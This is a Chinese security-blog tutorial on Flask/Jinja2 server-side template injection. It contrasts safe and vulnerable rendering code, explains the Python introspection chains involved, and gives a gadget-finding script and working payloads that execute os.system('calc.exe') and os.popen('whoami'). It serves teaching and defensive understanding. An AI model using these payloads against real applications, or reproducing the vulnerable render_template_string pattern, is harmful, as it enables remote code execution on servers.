<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/good.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/good.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"l1werenee.xyz","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="SSTI成因主要是一些编程语言的框架在使用模板渲染引擎的函数时代码不规范，过分信任用户的输入造成的模板注入，比如python的Jinja2 mako tornado django；php的smarty twig，java的jade velocity 这里主要分析一下python的Flask，不着重Flask的语法，从代码的角度分析成因">
<meta property="og:type" content="article">
<meta property="og:title" content="FlaskSSTI利用">
<meta property="og:url" content="https://l1werenee.xyz/2022/03/10/FlaskSSTI%E5%88%A9%E7%94%A8/index.html">
<meta property="og:site_name" content="Liwereneeのblog">
<meta property="og:description" content="SSTI成因主要是一些编程语言的框架在使用模板渲染引擎的函数时代码不规范，过分信任用户的输入造成的模板注入，比如python的Jinja2 mako tornado django；php的smarty twig，java的jade velocity 这里主要分析一下python的Flask，不着重Flask的语法，从代码的角度分析成因">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://l1werenee.xyz/2022/03/10/FlaskSSTI%E5%88%A9%E7%94%A8/image-20220313132852816.png">
<meta property="og:image" content="https://l1werenee.xyz/2022/03/10/FlaskSSTI%E5%88%A9%E7%94%A8/image-20220313135542789.png">
<meta property="og:image" content="https://l1werenee.xyz/2022/03/10/FlaskSSTI%E5%88%A9%E7%94%A8/image-20220313142007824.png">
<meta property="og:image" content="https://l1werenee.xyz/2022/03/10/FlaskSSTI%E5%88%A9%E7%94%A8/image-20220313143651822.png">
<meta property="og:image" content="https://l1werenee.xyz/2022/03/10/FlaskSSTI%E5%88%A9%E7%94%A8/image-20220313144624969.png">
<meta property="og:image" content="https://l1werenee.xyz/2022/03/10/FlaskSSTI%E5%88%A9%E7%94%A8/image-20220313145311172.png">
<meta property="article:published_time" content="2022-03-10T11:41:30.000Z">
<meta property="article:modified_time" content="2022-03-14T08:36:01.535Z">
<meta property="article:author" content="L1we7enee">
<meta property="article:tag" content="SSTI">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://l1werenee.xyz/2022/03/10/FlaskSSTI%E5%88%A9%E7%94%A8/image-20220313132852816.png">

<link rel="canonical" href="https://l1werenee.xyz/2022/03/10/FlaskSSTI%E5%88%A9%E7%94%A8/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>FlaskSSTI利用 | Liwereneeのblog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="Liwereneeのblog" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Liwereneeのblog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">温良恭俭让</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://l1werenee.xyz/2022/03/10/FlaskSSTI%E5%88%A9%E7%94%A8/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="L1we7enee">
      <meta itemprop="description" content="心若不动风又奈何，你若不伤岁月无恙">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Liwereneeのblog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          FlaskSSTI利用
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-03-10 19:41:30" itemprop="dateCreated datePublished" datetime="2022-03-10T19:41:30+08:00">2022-03-10</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-03-14 16:36:01" itemprop="dateModified" datetime="2022-03-14T16:36:01+08:00">2022-03-14</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/SSTI/" itemprop="url" rel="index"><span itemprop="name">SSTI</span></a>
                </span>
            </span>

          <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>3.5k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>3 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h3 id="SSTI成因"><a href="#SSTI成因" class="headerlink" title="SSTI成因"></a>SSTI成因</h3><p>主要是一些编程语言的框架在使用模板渲染引擎的函数时代码不规范，过分信任用户的输入造成的模板注入，比如python的Jinja2 mako tornado django；php的smarty twig，java的jade velocity</p>
<p>这里主要分析一下python的Flask，不着重Flask的语法，从代码的角度分析成因</p>
<span id="more"></span>

<p>首先来看两端代码</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> render_template</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span>,methods=[<span class="string">&#x27;GET&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">hello_world</span>():</span><br><span class="line">    query = request.args.get(<span class="string">&#x27;name&#x27;</span>)<span class="comment"># 获取get方法传递的 name的值</span></span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&#x27;demo_tmp.html&#x27;</span>, name = query)<span class="comment"># 将get接收到的name的值传入模板,进行渲染</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.run(debug=<span class="literal">True</span>)  <span class="comment"># 开启 debug模式,每次修改代码后就不需要手动重启服务器,服务器会在代码修改后自动重新载入</span></span><br></pre></td></tr></table></figure>

<p>创建一个放模板的templates目录，里面放入模板demo_tmp.html</p>
<figure class="highlight html"><table><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>Welcome to Flask<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"> <span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">      <span class="tag">&lt;<span class="name">h1</span>&gt;</span>Hello, &#123;&#123;name&#125;&#125;!<span class="tag">&lt;/<span class="name">h1</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>运行python代码</p>
<p>在端口输入127.0.0.1:5000,运行</p>
<p>pyhtonFlask使用的模板引擎是jinja2</p>
<p><code>模板中使用 &#123;&#123; &#125;&#125; 语法表示一个变量,它是一种特殊的占位符.当利用jinja2进行渲染的时候,它会把这些特殊的占位符进行填充/替换,jinja2支持python中所有的Python数据类型比如列表、字段、对象等.</code></p>
<p>我们传入参数49，可以看到输出</p>
<img src="/2022/03/10/FlaskSSTI%E5%88%A9%E7%94%A8/image-20220313132852816.png" class>

<p>没有输出49，说明不存在模板注入；</p>
<p>在来看一段代码</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line">from flask <span class="keyword">import</span> Flask</span><br><span class="line">from flask <span class="keyword">import</span> render_template</span><br><span class="line">from flask <span class="keyword">import</span> request</span><br><span class="line">from flask <span class="keyword">import</span> <span class="type">render_template_string</span></span><br><span class="line"></span><br><span class="line"><span class="variable">app</span> <span class="operator">=</span> Flask(__name__)</span><br><span class="line"><span class="meta">@app</span>.route(<span class="string">&quot;/index/&quot;</span>)</span><br><span class="line">def <span class="title function_">test</span><span class="params">()</span>:</span><br><span class="line">    Liwer = <span class="string">&#x27;&#x27;</span><span class="string">&#x27;</span></span><br><span class="line"><span class="string">    &lt;h1&gt;%s&lt;/h1&gt;</span></span><br><span class="line"><span class="string">&#x27;</span><span class="string">&#x27;&#x27;</span> % (request.args.get(<span class="string">&quot;name&quot;</span>))</span><br><span class="line">    <span class="keyword">return</span> render_template_string(Liwer)</span><br><span class="line"></span><br><span class="line"><span class="type">if</span> <span class="variable">__name__</span> <span class="operator">=</span>= <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.debug = True</span><br><span class="line">    app.run()</span><br></pre></td></tr></table></figure>

<p>这是一段存在SSTI的代码</p>
<p>输入?name&#x3D;49输出</p>
<img src="/2022/03/10/FlaskSSTI%E5%88%A9%E7%94%A8/image-20220313135542789.png" class>

<p>对比上面两种代码，一个不会存在SSTI，一个存在；</p>
<p>未产生漏洞的代码通过<code>render_template(&#39;demo_tmp.html&#39;, name = query)</code>进行渲染，要渲染的参数通过name &#x3D; query是写死的</p>
<p>，用户不能控制；</p>
<p>产生漏洞的的代码，将参数拼接到要渲染的Liwer参数中，如果我们的参数中存在<code>&#123;&#123;&#125;&#125;</code>，那么<code>render_template_string(template)</code>进行渲染的时候就会把 <code>&#123;&#123;&#125;&#125;</code>中的内容进行解析.</p>
<h3 id="如何利用"><a href="#如何利用" class="headerlink" title="如何利用"></a>如何利用</h3><p>多数人就会想，既然存在注入那好办，直接<code>&#123;&#123;import os;os.system('')&#125;&#125;</code>命令执行，答案是不行的，</p>
<p>jinja2引擎限制了使用import，这时候python的内置的一些属性就可以发挥作用了</p>
<h4 id="魔术方法和内置属性"><a href="#魔术方法和内置属性" class="headerlink" title="魔术方法和内置属性"></a>魔术方法和内置属性</h4><p><code>__class__</code>:返回该实例对象的类</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="string">&#x27;&#x27;</span>.__class__</span><br><span class="line"><span class="comment"># &lt;class &#x27;str&#x27;&gt;</span></span><br></pre></td></tr></table></figure>

<p><code>__base__</code>:返回该类的父类</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="string">&#x27;&#x27;</span>.__class__.__base__</span><br><span class="line"><span class="comment"># &lt;class &#x27;object&#x27;&gt;</span></span><br><span class="line"><span class="comment"># 及 object 是 str 的基类(父类)</span></span><br></pre></td></tr></table></figure>

<p><code>__subclasses__</code>():返回当前类的所有子类,返回结果是个列表</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="string">&#x27;&#x27;</span>.__class__.__base__.__subclasses__()</span><br><span class="line"><span class="comment">#[&lt;class &#x27;type&#x27;&gt;, &lt;class &#x27;weakref&#x27;&gt;, &lt;class &#x27;weakcallableproxy&#x27;&gt;, &lt;class &#x27;weakproxy&#x27;&gt;, &lt;class &#x27;int&#x27;&gt;, &lt;class &#x27;bytearray&#x27;&gt;, &lt;class &#x27;bytes&#x27;&gt;, &lt;class &#x27;list&#x27;&gt;, &lt;class &#x27;NoneType&#x27;&gt;, &lt;class &#x27;NotImplementedType&#x27;&gt;, ...</span></span><br></pre></td></tr></table></figure>

<p>通过这些内置方法和属性我们间接的获取到了一些类，由于无法import，而一些子类和父类导入了一些模块的，如果存在我们需要的类，我们只需要初始化这个类，在利用<code>__globals__</code>调用可利用的函数,就能够达成我们的目的.</p>
<p>例如，我们要命令执行，可以执行system函数，那么我们就可以初始化这个类</p>
<p><code>&lt;class &#39;os._wrap_close&#39;&gt;</code></p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="string">&#x27;&#x27;</span>.__class__.__base__.__subclasses__()[<span class="number">128</span>]</span><br></pre></td></tr></table></figure>

<img src="/2022/03/10/FlaskSSTI%E5%88%A9%E7%94%A8/image-20220313142007824.png" class>

<h4 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h4><p><strong><code>__builtins__</code></strong></p>
<p>python在启动时就加载<code>__builtins__</code>,里面包含了一些常用方法比如:<code>abs()</code>,<code>max()</code>,<code>eval()</code>等等;</p>
<p>如何查找那些类存在<code>__builtins__</code>，使用脚本查找</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">exp_flask = <span class="string">&#x27;__builtins__&#x27;</span></span><br><span class="line">number = <span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="string">&quot;&quot;</span>.__class__.__base__.__subclasses__():</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        <span class="keyword">if</span> exp_flask <span class="keyword">in</span> i.__init__.__globals__.keys():</span><br><span class="line">            <span class="built_in">print</span>(number,<span class="string">&quot;--&gt;&gt;&quot;</span>,i)</span><br><span class="line">    <span class="keyword">except</span>:</span><br><span class="line">        <span class="keyword">pass</span></span><br><span class="line">    <span class="keyword">finally</span>:</span><br><span class="line">        number += <span class="number">1</span></span><br></pre></td></tr></table></figure>

<img src="/2022/03/10/FlaskSSTI%E5%88%A9%E7%94%A8/image-20220313143651822.png" class>

<p>到目前为止就可以简单的构建payload</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="string">&#x27;&#x27;</span>.__class__.__base__.__subclasses__()[<span class="number">128</span>].__init__.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;__import__(&#x27;os&#x27;).system(&#x27;calc.exe&#x27;)&quot;</span>)</span><br></pre></td></tr></table></figure>

<p>成功弹出计算器</p>
<img src="/2022/03/10/FlaskSSTI%E5%88%A9%E7%94%A8/image-20220313144624969.png" class>

<p><strong><code>sys</code></strong></p>
<p>通过上面的脚本查找sys</p>
<p>构造payload</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="string">&#x27;&#x27;</span>.__class__.__base__.__subclasses__()[<span class="number">75</span>].__init__.__globals__[<span class="string">&#x27;sys&#x27;</span>].modules[<span class="string">&quot;os&quot;</span>].popen(<span class="string">&quot;whoami&quot;</span>).read()</span><br></pre></td></tr></table></figure>

<img src="/2022/03/10/FlaskSSTI%E5%88%A9%E7%94%A8/image-20220313145311172.png" class>

<p><strong><code>__import__</code></strong></p>
<p>同样使用脚本查找</p>
<p>构造payload</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="string">&#x27;&#x27;</span>.__class__.__base__.__subclasses__()[<span class="number">75</span>].__init__.__globals__[<span class="string">&#x27;__import__&#x27;</span>](<span class="string">&#x27;os&#x27;</span>).system(<span class="string">&#x27;calc.exe&#x27;</span>)</span><br></pre></td></tr></table></figure>










    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>L1we7enee
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://l1werenee.xyz/2022/03/10/FlaskSSTI%E5%88%A9%E7%94%A8/" title="FlaskSSTI利用">https://l1werenee.xyz/2022/03/10/FlaskSSTI利用/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/SSTI/" rel="tag"># SSTI</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/03/09/%E9%80%9A%E8%BF%87%E5%8F%8D%E5%B0%84%E8%8E%B7%E5%8F%96Unsafe%E5%AE%9E%E4%BE%8B/" rel="prev" title="通过反射获取Unsafe实例">
      <i class="fa fa-chevron-left"></i> 通过反射获取Unsafe实例
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/03/16/Flask%E5%BC%80%E5%90%AFdebug%E7%9A%84%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98/" rel="next" title="Flask开启debug的安全问题">
      Flask开启debug的安全问题 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#SSTI%E6%88%90%E5%9B%A0"><span class="nav-number">1.</span> <span class="nav-text">SSTI成因</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A6%82%E4%BD%95%E5%88%A9%E7%94%A8"><span class="nav-number">2.</span> <span class="nav-text">如何利用</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95%E5%92%8C%E5%86%85%E7%BD%AE%E5%B1%9E%E6%80%A7"><span class="nav-number">2.1.</span> <span class="nav-text">魔术方法和内置属性</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%88%A9%E7%94%A8"><span class="nav-number">2.2.</span> <span class="nav-text">利用</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="L1we7enee"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">L1we7enee</p>
  <div class="site-description" itemprop="description">心若不动风又奈何，你若不伤岁月无恙</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">6</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/l1werenee" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;l1werenee" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://blog.csdn.net/qq_53863234" title="CSDN → https:&#x2F;&#x2F;blog.csdn.net&#x2F;qq_53863234" rel="noopener" target="_blank"><i class="fa fa-crosshairs fa-fw"></i>CSDN</a>
      </span>
  </div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-bug"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">liwerenee</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">12k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">11 分钟</span>
</div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/clicklove.js"></script>

